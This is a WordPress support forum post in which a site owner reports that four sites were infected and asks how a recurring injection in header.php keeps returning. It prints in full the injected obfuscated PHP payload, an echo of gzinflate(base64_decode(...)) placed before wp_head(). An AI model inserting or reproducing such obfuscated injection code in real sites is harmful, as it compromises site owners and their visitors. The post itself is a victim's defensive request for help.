Title: Malware in header.php?
Last modified: August 20, 2016

---

# Malware in header.php?

 *  [Chris Demetriad](https://wordpress.org/support/users/carlozdre/)
 * (@carlozdre)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/malware-in-headerphp/)
 * Four different websites got infected and been blocked by Google, and after a 
   quick look, I’ve noticed this just before wp_head():
 *     ```
       <?php
           #d93065#
           echo(gzinflate(base64_decode("tVVNj5swEP0t5RJoRIoN/kBe99Ceeu4RcYgI2Z1VNlCgiVbR/veOByebbEm6qrRKQsb2+M2bmWd811cdtMPXyqYxM2BjFrN5ZVrbLru+/rEdDKzDNgwSFswDjr80iKy1Oo2G7vnwrWk29XIbRkXQdrjYDM2Af89tHZSLXy/Vcqgewvq+3t/3q+iASHvYrpr9YtVUv5/q7RCtbTGLUw7uJzOQDOIcYgYiB5WA0KAkSA0yAYkzAgRI7kZocpxWtHK2rjLgAnQCWQpCOudUkUE+CBxzEIqwc+eGQzQRD4SzNDJB3COjV1YqfUVBG4ESYPrCWWeOu2OiHA0XLp8CvJ6a0g4bA+LIs1XA8gkKiIwh3IwGTlnIlNLHLwOGZcEPpocD98wJmgIJt8tFJgYJmRReAy0yQqI6xbQNgwtywPkxFO7zyzjl6GfUFCLw1kNRMjrxrRqXlaIkM8ImWyqfNno69qkPK3JfH6w1knJ8s2OBMp8RowYLKroaqy99BdlJIszNoKciJEFI7DSBnDijSk/UmlMbJtt9NnSbqJRCX7CL8xsKmlCHomycQ+5PA6d2X1eNGFWT0D5Ke/JkjNqfkBIfc8Np4XXr+pgd5ZT6Lp2KOgKd5Id2+kECvOB1LiPxDwmdjsQbFeHkdcQr8hqxrinsFuK59LzwbzM4ynLa+b2NuTyyx/b4I/k/rf77lE+Bvv8194FvcEGHgJGKRrVhA6VXAsYSdLnIybf3rCySctG3GxjCGcwis7NBjZfZbomPTWBe8PraRbUdr7BiV5q9XZveFqXp7M+hg+29WTddaIRUnywYmFsWHR7R6m0/74pgjTh0ST59x+fD0tnOalZ4W4b74rH8zOYZiyhSHdVhH5m7L/5+/gM=")));
           #/d93065#
           wp_head(); ?>
       ```
   
 * I have cleaned the code but this reappeared after a few hours. Then again and
   again. I thought that timthumb is the culprit, but this happened on a WordPress
   without timthumb aswell as I’ve scanned it previously with timthumb vulnerability
   scanner.
 * There’s nothing suspicious in htaccess, wp-config and the files everyone is talking
   about, from wp-includes, have checked all the js files, nothing, nothing, nothing.
 * **What could it be, how do I get rid of this?**

The topic ‘Malware in header.php?’ is closed to new replies.

 * 0 replies
 * 1 participant
 * Last reply from: [Chris Demetriad](https://wordpress.org/support/users/carlozdre/)
 * Last activity: [14 years, 2 months ago](https://wordpress.org/support/topic/malware-in-headerphp/)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics